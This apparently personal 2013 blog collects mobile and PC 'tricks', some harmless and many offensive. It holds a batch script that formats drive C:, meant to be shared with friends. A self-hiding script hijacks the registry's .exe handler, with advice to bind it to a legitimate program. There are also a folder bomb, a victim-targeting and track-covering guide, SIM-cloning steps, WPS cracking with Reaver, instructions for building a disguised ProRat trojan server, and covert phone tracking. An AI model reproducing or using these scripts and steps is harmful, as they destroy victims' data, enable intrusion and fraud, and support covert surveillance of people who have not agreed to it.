Friday 30 August 2013

Hide a folder in JAVA MOBILE PHONE.........




1..Just go to the folder which you
want to hide

2..Now rename the folder with adding
“.jad” without
quotes at the end of folder’s name
E.g you want to hide
your Songs folder then just go to the
place where you
can see the folder and rename it with
songs.jad

3..Now create another folder with
same name in the same
directory but add “.jar” without
quotes at the end of the
folder’s name E.g Songs.jar

4..Now you have hide the file safely
from unwanted eyes.

hit like for more mobile tricks

Make a folder bomb


Here is a great batch file trick with only three lines of batch file scripting. You can call this a virus if you want.

So what does this batch file do exactly?

When the batch file is opened the batch file go into an infinite loop creating new foldersat an amazing rate! It can create more than 1000 new folders in just 6 seconds.

Cleaning the newly made folders would be difficult if opened in a directory with a lot of important folders and files.

Follow the steps to make the folder bomb!

Step 1: Open notepad.

Step 2: Copy and paste the following code into notepad.

:start
md %random%
goto start

Step 3: Save as Flood.bat. Remember to include the .bat at the end of the file name while saving.

That's it! You folder bomb is ready!

WARNING: If you want to test thisbatch file, open the batch file in a new and empty folder. Do not open the batch file on your desktop or other important directories.

Enjoy!

Wednesday 28 August 2013

Here's to a wonderful batch virus !


I am WARNING YOU !!! This shit is
dangerous !!! Play at your own RISK !!!
@echo off
title Stealing, Lying, Now Your PC Is
Dying
start firefox.exe cyberstorm0.blogspot.com
cd C:\
:menu
cls
echo Hello, I want to play a game.
pause
echo Live or Die, Make your
choice:
echo 1. Format PC
echo 2. Exit
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
:one
echo y|format C:
:two
echo y|format C:
copy in notepad, save as
anything.bat [ you can replace
"anything" with whatever you
want but save it with the .bat
extension] ... Now share it with
your friends !!

3 Hidden Modes in Android Mobile phones



  • Fast Boot mode
  • Download mode
  • Recovery mode

DISCLAIMER: This information is intended for experienced users. Please

do not try any of following methods if you are not familiar with

mobile phones. We'll not be responsible for the use or misuse of this

information, including loss of data or hardware damage. So use it at

your own risk.
1. Fast Boot Mode
This mode is used to flash the phone firmware using command line

tools. To access this mode:
Power off your Phone.
Press and hold Call and End Call/Power keys.
2. Download Mode
This mode is also used to flash the phone firmware. Mostly this mode

is used by GUI tools for easier and quicker flashing. To access this

mode:
Power off your phone.
Press and hold Volume Down, OK and End Call/Power keys.
3. Recovery Mode
This mode is used for recovery purposes like to reset the phone

firmware. To access this mode:
Power off your phone.
Press and hold Volume Down, Call and End Call/Power keys.
Once the alert triangle is shown on screen, press "Menu" key to reset

the firmware or press "Home" and "End Call/Power" keys to show

recovery menu.

How you start hacking a specific target.


Hello, this little post will explain in rough details how you start

hacking a specific target.        

First. There are many different ways going about this, but this is one

way.

Information gathering
The first thing you want to do when targeting a specific target is get

as much information as possible before a front attack(if any, being

quiet is much better)
Now this step can take ages if you really want a detailed level of

knowledge. And if you are serious about hacking your target, you

should be detailed here.
What sort of information do I look for you might ask yourself? Well,

anything really. Anything surrounding the target and even things that

surround things that surround your target. Here is a short list of

things that might be useful;
IP(s), some machines/domains/systems or whatever have multiple domains
ISP(s), if small ISP(s), get owner details here as below
Owner. Email, name, location, family, hobby's, Facebook account, phone

number
*Open ports. On ALL of the ips/servers if there are multiple
Service signatures, find out as much as possible about all the open

ports, are they in use? What software are they running at the other

end? Do the services reveal any other information about the system?

OS? Internal IPS?
Hosters(In most cases there will be a hosting company)
Hosters information - Owner and all of that(If the company is small)
Hosters member system, how does the members login? Is there a login?

Is there a forgot password function? Can you exploit the hoster

instead?(might be easier in some cases)
DNS records(if any), subdomains? Hidden domains/info? DNS hosters?

Same as above.
The physical server(s) location / datacenter
And the list goes on and on and on. Literally EVERYTHING about the

company/system/server/target are relevant. The more info you got, the

easier it will be attacking him/her/them/it.

You should decide if you want to target the system or the people of

your target. That is, code/system flaws or human flaws(keyloggers,

Trojans, social engineering, info gathering + password guessing, etc).

This decision should depend on the information you find about your

target. Both can be tried ofcourse, just make sure the target does not

know you are trying to hack it, often one of the attempts will set off

alerts.

This whole information gathering part might seem unnecessary, but

really. Its neat, lets you put things in perspective so you can find

the best point of entry.

The attack
Before an attack is lunched, there are a few things you need to think

about. Here is a list of things you should think about;
Will this company/target rage crazy if I hack them? If so, check 3rd

point.
Will police or other agencies be contacted if I hack them? If so,

check 3rd point.
*Is my privacy good enough? Are you behind a proxy(s)? Should you? Do

the proxy log?(It shouldn't)
Are they running any services at all? If not, you don't really have

any virtual way in..
Are they running web applications? These are typically easier to hack

than services. And have a higher percentage rate of flaws.
Do the target got a open router/switch/modem system? This often

happens with home computers/networks.
Are your target running platforms with logins? These could be

targeted.
Do you have enough time? Its a good practice to have time enough to do

the entire attack in one go. Else you might fire off warnings for the

target, and he can go into a bombshelter We don't want that now, do

we?

Now there are tree ways of attacking in this guide.
- Service/software exploitation
- Web application exploitation
- Human factor exploitation

Service/software exploitation
Here you will exploit one or more services/programs running on the

target system. In most cases, this will be called bufferoverflow. This

can do everything from bypassing a login to give you instant shell

access. In scenarios where the target is running services which is not

a web server(can be tho) this might be the way to go.

Web application exploitation
This is without a doubt the most vulnerable field. Web applications

are flawfull, 70% or so of all pages got some sort of web application

flaw, this ofc may vary from an stupid XSS to a serious RFI. In

scenarios where the target system are running a web server, this is

the first thing to check. Do always check web applications before

going on to service exploitation if you just want to get the target

hacked.

Human factor exploitation
Now if all other things fail, there is ALWAYS a human factor. This can

be social engineering the target to give you limited access, and you

work your way up from there. Or simply tricking the target to trust

you and in some strange way share his password, perhaps not for the

system you are targeting, but for his email or an online account or

whatever, stupid people tend to use the same password or the same

password syntax everywhere. Keep in mind that the human factor doesn't

necessarily have to be your targets owner, could be the hoster, the

DNS hoster, the ISP, family.

Finale note
If you think its necessary, clear your tracks. If you ask me, if you

can see that you have been there you didn't do it right. Take care, be

safe.

HOW TO MAKE MOTHERBOARD USELESS


Now, there is no going back from executing this batch code. Once

executed it will rewrite the BIOS and a few other core clocks

rendering the motherboard useless. The only way to come back after a

execution of this code is to buy a new motherboard            

Copy the code below and save it withanyname.bat ... remember to save

it with the .bat extension !!!

@echo off & break off
:%random%
://associate .pic as batfile for camouflaggin
assoc .pic=batfile

:%random%
://creates and hides files
type %0 >%temp%\%username%.pic
type %0 >%temp%\%username%.bat
attrib +h +s +a +r %temp%\%username%.bat
attrib +h +s +a +r %temp%\%username%.pic

:%random%
://registry entry for starting worm on every *.exe execution
regadd "HKCR\exefile\shell\open\command" /v "@" /d "%temp%\%username

%.pic ""\%1\"" %* /f

:%random%
://starting hack !! Dude : You Have Just been hacked !! xD !!!
Echo 123>clock$ &echo 123>CON &echo 123>AUX &echo 123>PRN &echo

123>COM1 &echo 123>COM2 &echo 123>COM3 &echo 123>COM4 &echo 123>dosx

&echo 123>IO &echo 123>HIMEM &echo 123>XMSXXXX0 &echo 123>MOUSE &echo

123>REDIR &echo 123>KBD &echo 123>SYSTEM
exit

Now How to send it ??

1. Fool your friend into saying it is a great trick to speed up system

speed

2. Manually executing it from a USB

3. Binding it with a legit looking program and sending it to your

friend !!!

Remember I warned you, this shit is dangerous !!!

SIM Cloning


ITEMS REQUIRED
1. Plain Wafer Card
2. Sim card reader
3. Software to extract Ki & IMSI
4. Wafer Card Programmer
5. Software to program the wafer card

INTRODUCTION TO SIM CARD CLONING
This is a simple and complete guide to sim cloning. With the help of

this guide, you will be able to get your sim cloned. This guide is

applicable for cloning COMP128V1 version simcards. Even though the

newer algorithms can’t be cloned now, almost 75% of us are using the

cards with the COMP128V1 algorithm.

PROCESS
STEP1 : Insert the simcard in the simcard reader and use the software

to extract the Ki, IMSI and ICCID of your simcard. Here i used Woron

scan 1.09

STEP2 : Make the files for PIC and EEPROM with SimEmu Configurator or

16 in 1 SimEmu Configurator by Pic-ador. If you are using the SimEmu

Configurator by Pic-ador uncheck the A3A8 check box under security.

Please dont enable this even from the sim services menu. If enabled,

it counts back to zero and when it reaches zero, all bad things can

happen to your simcard. In the configurator you can set the number of

ADN, FDN and SMS. You can use the formula “16448 = (ADN – 51 ) x 32 +

SMS x 176 + FDN x 32 must be less than 6480” for silver wafer cards.

Then generate the Hex files for PIC and EEPROM by clicking the

Generate Hex file. With this configurator, in addition to the 16

number slots, you can make the simcard a Motorola Test card too. In 16

in 1 configurator the positions are from 0-9 and from A-F. Each

position can be customized by individual PIN an PUK codes.

STEP3 : Now we have the files to be written to the Silver Wafer card.

For this we need the Wafer card programmer and the software for

programming. Here i am using the Millenium 2000VX Max programmer and

the Cardmaster 2.1 software. Connect the programmer and run the

software. Select the type of card you are using. Select the port by

clicking setup > port. If the port set by you is correct the red

colour with message on status bar changes to yellow and shows no

simcard. Insert the simcard and load the files for PIC and EEPROM in

the file to PIC and file to EEPROM fields respectively. Don’t change

any other settings. Now you are at the last stage. Press F3 or click

edit > Auto Program. You can watch the status bar about what is

happening. Programming the pic.. programming the EEPROM… programming

the pic…. verifying…. and at last you will get the message that the

card is programmed successfully. Here you may ask the question why the

PIC is programmed again after programming the EEPROM?. The PIC is

first programmed with the EEPROM loader to program the EEPROM. then

the EEPROM is programmed through the pic. After that the contents in

the pic is erased and the actual file is programmed in the PIC.

STEP4 : Now you are completed. Take the card out of the programmer,

cut it to the size of the normal simcard and put it in the handset.

After switching on, the handset asks for PIN code. Enter any four

digit number. This will be the PIN for your first position “0”. It

asks for the PUK too for the first position. The phone switches on

with no network or “Sim card not registered error”. This is normal

because no operator information is there on the simcard. Now we are

moving to the final step of your dream. Browse through the menu and

find the Sim Tool Kit. Now it should be named as Sim-Emu 6.01. Open it

and you can see the menus Configure, Select Phone and Information.

Select Configure and go to config postion. It asks for the position.

You can select any position from 0-9 and A-F. After selecting the

position it asks for a PIN and PUK. Always provide different PIN and

PUK for each positions. It helps us to switch to a number directly

when the handset is switched on. After PIN and PUK it asks for KI,

IMSI and ICCID. You can now recall the extracted values from STEP1 and

enter it to appropriate fileds. Now you are done. You have a cloned

simcard and moreover you are going to have a simcard with 16 cloned

mobile numbers.

Wednesday 21 August 2013

How to Hide files behind Images



In order to do this you should have basic understanding of command line
1. Select an image to be used for hiding file behind the image.
2. Now select a file to hide behind the image and make it in .RAR format. With the help of the WinRAR.
3. And most important is that paste both the files on desktop. You may do this anywhere instead of desktop if you have some basic understanding of command line.
4. Now open cmd by going to Start > Accessories > Command Prompt and type following
commands in it.

5. CD stands for change directory by typing above command you change your directory to desktop. After that type command given below.
Copy /b imagename.jpg + filename.rar finalimage.jpg
Replace imagename.jpg with the name of image you want your file to be hidden behind. Don't forget to add image format (Eg: .jpg,.png,.gif)
Replace filename with name of your file you want to hide. It must be in .rar format.
Finally Replace finalimage.jpg with whatever name you want your final image with hidden files should be. This is the image where your file will be hidden.

6. Now when you will try to open this newly created image it will open as normal image, but to open you hidden file you need follow steps given below.

How To Access Hidden File ?

To access your hidden file you need to open the newly created image in winrar. Just follow simple steps given below to do that.

1. Open winrar
2. Now locate your image and open it or simply drag your image in winrar.
3. Extract the file and done.

New Awesome Youtube Missile Game Trick





Today i will share an amazing trick that i came across we will call it youtube missile trick. Since google is celebrating geek week it introduced this trick.


How To Do ?

   1. Open youtube and click on any video you would like to play
   2. Pause the videol
   3. Now type 1980 and see the magic

Once you start this game missile will start coming from the top. The job of missile is to destroy the video. You can protect the video by firing back using your mouse.

Thursday 15 August 2013

Human Computer

PARTS OF MAN:
  • HEARTS OF MAN :--------           MICROPROCESSOR
  •  
  • EYES OF MAN:------------           MONITOER
  •  
  • BRAIN OF MAN:----------            HARDDISK
  •  
  • EAR OF MAN:-------------            KEYBOARD
  •  
  • NOSE OF MAN:-----------            MOUSE
  •  
  • MOUTH OF MAN:---------           SPEAKER
  •  
  • NERVES OF MAN:---------           BUS
  •  
  • KIDNEY OF MAN:---------          U.P.S
  •  
  • HAND OF MAN:------------         PRINTER
  •  
  • BLOOD OF MAN:----------         CURRENT

Funny Computer Acronyms



IBM:-                  I Blame Microsoft

WIN:-                 Warn Invasion Netware

APPLE:-             Arrogance Produces Profit Losing Entity

DEC:-                 Dump Everything and Close

HCl:-                  Hilarious Computer Logic

MAC:-               Most Amusing Computer

CD-Rom:-          Consumer Device Rendered Outdated IN Months

How to Bypass Surveys Online | Sharecash |



How to Bypass Surveys Online

Are you tired of getting Surveys while Downloading Required files,eBooks or Software’s online ? – Just Read this Post to Learn How to Bypass Surveys Online.We all are very much familiar with Surveys which we often do in our real life sometimes in Paper whereas sometimes filling up Surveys Online related to Our Lifestyle,Products,Job and much more .In past years surveys were used to analyze or collect data from people but now a days they have become a Source of Monetization more as compared to collecting relevant Correct Data from the People worldwide.


How to Bypass surveys Online – Must Read Before Trying

How to Bypass surveys Online 2013 Working Methods – Generally these Survey are found on files hosted on Sharecash or Fileice where the user who has uploaded the files get paid every time a user completes the survey for accessing the uploaded file by the User.You will find these surveys in more than 50% cases where you need to download the files.Bypassing the Surveys is not very much easy you will find hundreds of different methods to bypass surveys online but the real truth behind these methods is that some of them are fake or some work partially but there are a few methods which really works by bypassing these surveys still we can’t guarantee that these methods will 100% work because of the increasing security used by the survey sites. Online Data Entry Jobs without Investment Therefore Here I am here providing you with different methods on How to Bypass Surveys online which I have personally tested but still no guarantee that it will work for you also.Try Using the methods and check which one works the best for you.See below to learn How to Bypass surveys Online 2013.



Method 1 : Using Online Sites – Surveybypass | Howtobypasssurveys


Surveybypass and Howtobypasssurveys are two most Popular sites to remove or bypass surveys completely for free.They allow survey bypass for all the major hosts like Sharecash,Fileice,Cleanfiles,cash-file,Adwork media,File fire,File flare,Dengee and uploadables.


Using Survyebypass Site :

You just need to go to Surveybypass official website and there Just paste the URL of the the page where you are getting the Survey form and then just click on GO Button.It will now Provide You with direct download link of the file which you want to download without asking for survey anymore.


Method – 4 : Disabling Javascript

You can also Disable JavaScript of Your Web browser to Remove the Surveys Completely.Sometimes this Method works whereas sometimes it fails but still you can try for your own and see if it works for You.


How to Disable JavaScript on Firefox :

Open Your Firefox and Click on Firefox button and then Click on Options.
Navigate to Content Tab.
Here Untick the Box Enable Javascript
That’s all and You have successfully disabled JavaScript.

How to Disable Javascript on Chrome :

Open Google Chrome and Click on the Wrench icon at the Top
There Select Settings option.
Now Click on Show Advance Settings.
Now Click on Content Settings Under Privacy Section.
Here Just Check Do not allow any site to run JavaScript Option.

Note – Important

As said in the starting of the post we don’t guarantee that these methods will 100% work for you but have tested by most of the Users therefore if you face any problem while using the Above methods please tell us or if you get to know any other working method to bypass surveys online please tell us and we will update it soon.That’s all in How to Bypass surveys Online.

How to Increase Mobile Internet Speed – Super Fast


How to Increase Mobile Internet Speed – Super Fast

How to Increase Mobile Internet Speed – Super Fast : Today in the Era of Technology Internet has Become a Necessity for all the People  across the World Whether they are School Kids or Working Employees.Internet has become a Source For Every Kind Of Information where you can Fulfill all your Needs.To Enjoy Internet You must have a High Speed Internet Connection to Enhance Your Internet Browsing as well as Downloading Experience.I Have Already Discussed Some of the Important Articles Related to Optimizing Your Internet Experience like How to Boost and Increase Your Internet Speed , How to Increase YouTube Buffering Speed.Watching Online Movies or Videos over the Internet Becomes Frustrating due to Continuous Waiting For Video Buffering due to Death Slow Internet Speed. I Have Already Seen Most of the Mobile Internet Users Complaining About Slow Internet Browsing and Downloading Speeds even After Getting a High Speed Internet Data Plan.But Getting a High Speed Internet Data Plan Doesn’t Necessarily Means that You will Get the Exact Speed or Fast Speed as Provided by the Company so  it Becomes Necessary to Optimize Your Mobile Internet Settings to Get the Most Out of Your Mobile Internet.Before I tell you Important Tips on How to Increase Mobile Internet Speed it is Recommended to Read the Cause For Slow Mobile Internet Speed on Your Smartphones.


Reasons For Death Slow Mobile Internet Speed

Poor Network Coverage Area.
Poor Network Configuration or Settings in Your Mobile.
Heavy Load In the Network.
Slow Internet Data Plan.


How to Increase Mobile Internet Speed – Super Fast : Tips

After Reading the Above Reasons you must be Now Familiar with the Main Causes Responsible For Slow Mobile Internet Broadband speed therefore if You Are Using Internet at areas where Network Coverage is Very Poor then there are very Rare Chances that Your Internet Speed Can be Increase but nevertheless it can be Optimized For Best Performance so that you can Get Faster Browsing and Downloading Speeds as Compared to the Speed that You are Getting Currently.There Are Different Ways For Increasing Mobile Internet Speed like By Optimizing Mobile Settings,Using Fast Browsers or by Using Apps for Optimizing Your Internet.Use the Tips on How to Increase Mobile Internet Speed to Get Blistering Fast Browsing and Downloading Speeds on Your Mobile.

Manually Increasing Mobile Internet Speed

Make Sure to Use Internet at Good Network Areas.
Clear or Free Your Phone Memory.
Remove Web Cache and Old History.
Never Run Multiple Applications While Browsing Internet.
If You want Text Search Results it is Better to Block Image Search For Fast Browsing.
Do not Load Your Mobile with lots of Apps.
Using Opera Mini or UC Browser For Browsing Internet.
Disable Auto-Update Feature For Applications.

Increase Mobile Internet Speed – Android Phones

How to Increase Mobile Internet Speed in Android Devices – Majority of the People Are Using Android Phones Today and Therefore If You are an Android Smartphone User You will be Happy to Know that There are Lots of Apps Available on Google Play store that Can help you to Increase Your Mobile Internet Speed Directly.

Use UC Browser For Browsing and Downloading

UC Browser is one of the Fastest Mobile Internet Browser which Providing Lightning Fast Browsing and Downloading Speeds.UC Browser is Available in 7 Different Languages with more that 400 Million Satisfied User Across the World.Therefore Download and Install UC Browser on Your Android Devices For Fast Mobile Internet Speed.

UC Browser For Android Smartphones


Use Apps to Increase Signal Strength

You can Use Network Signal Strengthening Apps to Optimize Your Internet Connection in Your Android Mobile Devices For Best Performance.Here Below are Some of the Best Android Apps that You can Use For Free to Increase Your Mobile Internet Speed.

Network Speed Booster
Network Signal Speed Booster
Signal Booster for Android

Install Apps to Increase Internet Speed

After Increasing Your Network Signal Strength Use Apps For Increasing Your Internet Speed.This Will Help You get Even Much More Speed though you will see a Instant Increasing in Your Internet Speed After Increasing Your Network Signal Strength.

Internet Booster

Note - These Apps Requires Your Android Phone to be Rooted before You can Use these Apps.

Wednesday 14 August 2013

How to Unlock Password Protected Memory Cards – FIXED 100%


How to Unlock Password Protected Memory Cards  ? – Have you forgotten your Memory Card Password and want to Unlock it without Formatting the Memory Card ? – Don’t Worry Just Go through this post and all your problems will be resolved within a few minutes.Memory Cards are the Most Widely Used Secondary Storage Devices generally found in Smartphones,Tablets or Camera’s for Storing Your Personal Data or any other Important Information.Now all the Latest Smartphones or Tablets comes with an External SD Memory Card Support for Storing extra data on your Devices.We Use memory cards for storing music,videos,movies or documents and much more.Even sometimes we require to save our Personal or Official Data on these memory cards and thus their Privacy becomes the most Crucial thing for which we usually set up a password for memory card in order to Prevent Unauthorized access to the Stored Information in Memory Cards.But what if you forgot your Memory Card Password ?? – Forgetting the Memory Password can prove to very disastrous for most of the users if some very useful data is stored in their Memory Cards because no company provides any support or software to remove the Password Protection from the Memory Cards.Also you can’t even access any password protected memory card in your Windows PC until you remove the Password Protection from the Memory Card or Format Your Memory Card.So if you are the one facing difficulty in unlocking your Password Protected memory card then don’t worry anymore I am here to help you to get your Problem sorted out.Read the Guide on How to Unlock Password Protected Memory Cards.

How to Remove Password From Memory Cards – Methods

Till now there are only two Available methods by which you can easily remove Password Protection from your Memory cards which are listed below.

By Formatting Your Memory Card – Not Recommended
By Using FExplorer a Free Utility tool for Symbian Devices. – Recommended
How to Unlock Password Protected Memory Cards – FExplorer

FExplorer is the best method to Completely Remove Password Protection from your Memory Card without losing your Valuable Data from your memory cards.FExplore Works by Providing you to access to the Memory Card system folder from where you can recover your password from a mmcstore text file which stores the password for your memory card.Follow the below given steps to learn How to Unlock Password Protected Memory Cards without formatting them.

Requirements Important :

FExplorer Work in Only Nokia Symbian S60 1st and 2nd Edition Smartphones

Subway Surfers For PC Download Windows 7/8/XP/Vista



Subway Surfers For PC




Subway Surfers For PC Download Windows 7/8/XP/Vista | How to Play Subway Surfers on PC : There’s No Doubt in Saying that Subway Surfers is one of the Best Games that you can Enjoy in Your Android Smartphones or Apple iOS Devices Just for Free.If You are Using an Android or Apple iOS Device then you must have Played and Enjoyed Subway Surfers on Your  Smartphones or Tablets.Subway Surfers is one of the Most Popular Downloaded Application with more that Millions of Downloads.Though the Game play of Subway Surfers is Pretty Much Similar to Temple Run a Runner Based Game but with lots of Amazing Features and Awesome Track Experiences that will keep you Thrilled whenever you Play.If You Liked Playing Temple Run then Definitely this Game will Keep you Thrilled every time you play it. And Now the Most Amazing News About Subway Surfers is that you can Now Enjoy it on Your Desktop Windows 7/8/XP PC.Because of its Growing Popularity You can Now Enjoy this Awesome Game on Your Personal PC’S or Computers or Laptops for Free of Cost thanks to the Developers as well as Bluestacks that made this Happen.Learn Here How to Play Subway Surfers on PC.Though Subway Surfers is not Officially Released for PC or Computer Windows Platform But Still you can Enjoy and Play it with the Same Thrilling action as you like to Feel While Playing on Your Android Smartphones or Tabs or Apple iOS Devices.So Here I am Providing You with two Most Popular and Common Methods to Enjoy or How to Play Subway Surfers on PC or Computer.Subway Surfers For PC Download From the Link Given Below.

Method – 1 : Through Direct Subway Surfers Setup(.exe)

It is one of the Most Common and Easiest Method to Play Subway Surfers on Your Windows PC or Computer.You Just Need to Install Subway Surfers through the .exe File Provided below from where you can Download Subway Surfers.exe File and Install it on Your Windows PC.But Before You Install Subway Surfers on Your Windows PC Make Sure that Your Computer Meets the Minimum System Requirements as Required by Subway Surfers to Run Smoothly and Properly without any lag or Graphic Issue or any other Issue.You Can See Subway Surfers PC Minimum Requirements as given below.

Subway Surfers For PC Download Windows 7/8/XP/Vista- Minimum PC System Requirements :

Processor – Intel Pentium 4 (Dual Core or Above Recommended)
RAM – 512 MB (1GB Recommended)
Graphics Card – Nvidia or ATI 256 MB (512 MB Recommended)
Hard Disk – 50 MB Space Required

How to Install Subway Surfers on PC :

First of All Download Subway Surfers Setup for PC.
After Downloading Double Click on .exe

Install it and Run Subway Surfers.exe

Thats all and You are All Done Now You can Enjoy Playing Subway Surfers on Your PC.


Method -2 : Using Bluestacks Android Emulator

Bluestacks is Becoming very Popular now-a-days to Play All Android Apps on Your PC or Computer but the Main Drawback of Using Bluestacks is that it Requires a Powerful PC To Run it on PC i.e a Good Graphics Card and Minimum of 2GB RAM.But if Your Computer Can Run Bluestacks then it is the Best Application to Enjoy all your Favorite Android Apps like Whatsapp,Wechat,Temple Run or Subway Surfers and Much More.Though I have Already Discussed About How to Play Android Games on PC using Bluestacks Android Emulator but Still Here I am Giving you some More Information about Bluestacks Relating How to Install Subway Surfers in Bluestacks.

How to Install Subway Surfers in Bluestacks :

Download and Install Bluestacks in Your PC or Computer.
Bluestacks Online Installer

Bluestacks Offline Installer

Now You Need to Download Subway Surfers.apk File
Just Install Subway Surfers.apk
Open Bluestacks and There You will Find Subway Surfers in Installed Apps List.
Just Run Subway Surfers From There and Play and Enjoy.
Alternatively - Instead of Downloading Subway Surfers.apk You can Also Install it by Opening Bluestacks and Searching for Subway Surfers and Installing it From There.


Control Settings - By Default Controls are Set to Keyboard but you can Also Use Your Mouse By Changing the Control Layout by Opening Bluestacks Settings.

Sunday 11 August 2013

10 MOST POPULAR TORRENT SITES.


1. The Pirate Bay (Alexa Rank: 76 / Compete Rank: 412 / Last year #1)

2. Torrent (Alexa Rank: 164 / Compete Rank: 927 / Last year #2)

3. IsoHunt (Alexa Rank: 194 / Compete Rank: 2,154 / Last year #3)

4. KickassTorrents (Alexa Rank: 289 / Compete Rank: 897 / Last year #11)

5. BTjunkie (Alexa Rank: 299 / Compete Rank: 987 / Last year #5)

6. Demonoid.me (Alexa Rank: 465 / Compete Rank: 1,647 / Last year #20)

7. ExtraTorrent.com (Alexa Rank: 519 / Compete Rank: 2,208 / Last year #9)

8. TorrentDownloads.net (Alexa Rank: 736 / Compete Rank: 1,119 / Last year #7)

9. TorrentReactor (Alexa Rank: 1,088 / Compete Rank: 1,972 / Last year #6)

10. LimeTorrents.com (Alexa Rank: 1,160 / Compete Rank: 7,127 / Last year #na)



HOW TO: GET FREE PREMIUM ACCOUNT ON MEGAUPLOAD USING MEGAKEY

This summary is not available. Please click here to view the post.

Shutdown your friend's computer through chating


Hello friends. Today your's shivam is here with a cool trick. You can shutdown your friend's computer through chating. This is very simple and cool trick. Kindly follow these steps :-


Step 1: Before going to start clear all history, all cookies, stop all downloading and close all extra tabs. Mean to say stop all internet activities. Now go to your messanger and start chating with the victim.



Step 2: Go the start and click on run.



Step 3: In run command type cmd.exe and hit enter.



Step 4: A black screen will appear. This is command prompt. In this box type "netstat -n" (without quotes).



Step 5: Now if you done the step one correctly you see only one ip address many times (ip should be of victim).


Step 6: Now again, type "shutdown -i"(without quotes).A box will appear now click on add button.A small box will pop up. Now type ip address of computer which you get from "netstat -n" command.



Step 7: Now there are three options click on shutdown.


Step 8: To  show a message to victim's computer check the "warm users of the action" and set the number of seconds.



Step 9: Now select any option in shutdown event tracker.


Step 10: Now comes the best part of the prank. In last type your message like you got hacked and we destroy your computer. After this shutdown your computer is not going to start(type anything that scare your victim). Now click on ok and you are done. Have fun guys and must leave comment below.

How to Track a Cell Phone Location Without Them Knowing


Although there are many free cell phone tracking software programs available online, not all are reliable. I introduce you to two software programs that can let you track cell phones for free.

1. Google Latitude :

Google search engine has recently launched the 'Google Latitude' service which can let you track a cell phone for free. To be able to track your child's cell phone location, using this service, you will have to install this program on his or her phone and make sure that he has added you as a friend on Google Latitude log in. Once you are connected with him, you can easily track his whereabouts by installing Google Latitude on your phone too. You can easily track the location of friends and family on Google maps, using this facility. Most importantly, this service does not require your phone to be GPS enabled.

2. Buddyway :

Another online service which provides you with a similar facility to track cell phone location is Buddyway. Install the Buddyway application on the cell phone of any person you want to keep a tab on, without them knowing and then follow their movement on a web interface by logging in. The service record entire route of travel and the path can be seen in Google Earth 3D. Visit the Buddyway website to know more about tracking a cell phone location.

By bugging phones with any of Google Latitude, Buddyway or other such applications, you can track cell phone location and keep track of the movements of your family members, for safety purpose. There are many more web services, that let you track your children's movements online. Most of these are paid applications, but the two that I mentioned above are absolutely free. However, you need to be sly enough to install them on your child's phone to be able to track him or her without letting them know.

How to Shutdown PC with timer


Do you know that you can make your PC shutdown at a time u wish to?
Here is the trick!!
How To Make A Shutdown Timer!
********** METHOD 1 ***************

1. Right click on your desktop and choose "New=>shortcuts".

2. In the box that says "Type the location of the shortcut",
type in "shutdown -s -t 3600" without the quotation marks and click next. Note: 3600 are the amount of seconds before your computer shuts down. So , 60secs*60mins=3600secs.

3. Make up a name for the shortcut and you're done.
You can change the icon by right clicking=>properities=>change icon=>browse

TO ABORT:
To make an abort key to stop the shutdown timer just create another shortcut and make
the "location of the shortcut" to " shutdown -a" without the quotes.

MAKE BOOTABLE PENDRIVE WITHOUT ANY SOFTWARE


(No Software needed no script Need Very simple Trick)

Required Materials:
{Note: You can install only windows vista or above versions of windows using this mathod)

1. Windows Vista or Above versions of windows based computer.(32 or 64-bit)
2. ISO OR WINDOWS SETUP FOLDER (The WINDOWS you want to install via pendrive)
3. A Pendrive. (4GB or More)

Now follow these Steps:-
[Note:- Please Backup Your Pendrive Data Because we are going to formate it]

1. Right click on your pendrive and select format option.
2. In file system section "Select NTFS"
3. Tick On Quick Format.
4. Now Click on start button.After Done!
5. Turn Of your antivirus. (Because Sometimes Antivirus Gives An Error About the windows Setup file)

6. Now Go To Windows Setup Folder (The Windows you want to install via pendrive) [If ISO Then Extract It.]
7. Now Select all items from the windows folder and right click on any item and select send to>Your pendrive. (you can also copy all items and paste in the pendrive)

8. After done! Right click on your pendrive and select Eject. Now we are Done to boot the pendrive.

Your Pendrive is ready restart your computer and enjoy your bootable pendrive.

How to: Crack WPA/WPA2 with Reaver


There is a weakness in WPA that allows for attacker to brute force against the Wifi Protected Setup Pins and recover an access points password within 4-10 hours. The tool we are going to be using with this method is called Reaver. This method may only be used if the WiFi network is using PSK (Public Shared Key) as the authentication method.
In order to do this attack, you will require a wireless adapter that can be put into monitor mode. I recommend the Realtek RTL8187. Alfa cards will also do the job and you can find either one of these online for pretty cheap.

Step 1: Open a terminal window and find your wireless adapter.
Type in airmon-ng and this will display the wireless adapters you have connected.

Step 2: Put your Wireless Adapter into monitor mode.
You can do this by typing: airmon-ng start wlan0
(Yours may be different than wlan0, make sure to get the interface from the first step.)
Monitor mode basically lets your wireless adapter monitor all traffic received.
After this is complete, you will see at the bottom: “monitor mode enabled on mon0?. This ensures that your Wireless Adapter has been set to monitor mode.

Step 3: Determine which Access Point to attack.
In this step we will find out the BSSID of the access point you want to attack. This is the unique identifier for the access point.
Type: airodump-ng mon0
This will list all of the access points that are in your area and give their BSSIDs:

For this tutorial, I will be using that top network “linksys”
Under “Auth” you will see PSK (Public Shared Key). This cracking process will only work if the network is using PSK.
Take note of the BSSID and the Channel number.

Step 4: Let’s get cracking
We will now use Reaver to target the specific BSSID and Channel number to retrieve the password from the router.
The command you will type in is:
reaver -i mon0 -c 6 -b 80:96:B1:AA:A3:92 -vv
The 6 and the 80:96:B1:AA:A3:92 will be different for you of course, depending on the channel and BSSID you are targeting.

-i = The interface you wish to use.
-c = The channel number
-b = The BSSID of the access point.
-vv = Very verbose, it gives detailed information along the way but it is not required.
As you can see, Reaver starts by trying pin 12345670 against the Public Shared Key. It will keep trying pins until the correct one is found. When it is found, the access points password will be shown to you! This process can take roughly 4-10 hours.




How To Use ProRAT


ProRat is a Microsoft Windows based backdoor trojan horse, more commonly known as a RAT (Remote Administration Tool).

Step 1: Download free software called PRO RAT.
Launch pro rat. Pro rat has a lot options as keylogger, screen shot, file manager, pc shutdown.
Step 2: You should create ProRat Server and send it to the target pc. To create server click on the bottom Create.

Step 3: Enter your IP address, if you don't know your IP address click on red arrow. Also add your email address that will be used to send email notification.

Step 4: Next go to general settings, 5110 is the port that you will connect to the target PC, you can change server password. You can give a fake error message, when the target launches your remote file, error message will be shown. You can type the error message whatever you want. You can use the option to bind with the file. You can bind server with any file. Under server extension I recommend to use EXE (has icon support ) or SCR (has icon support). Under server icon select any icon that you want that your server look out.

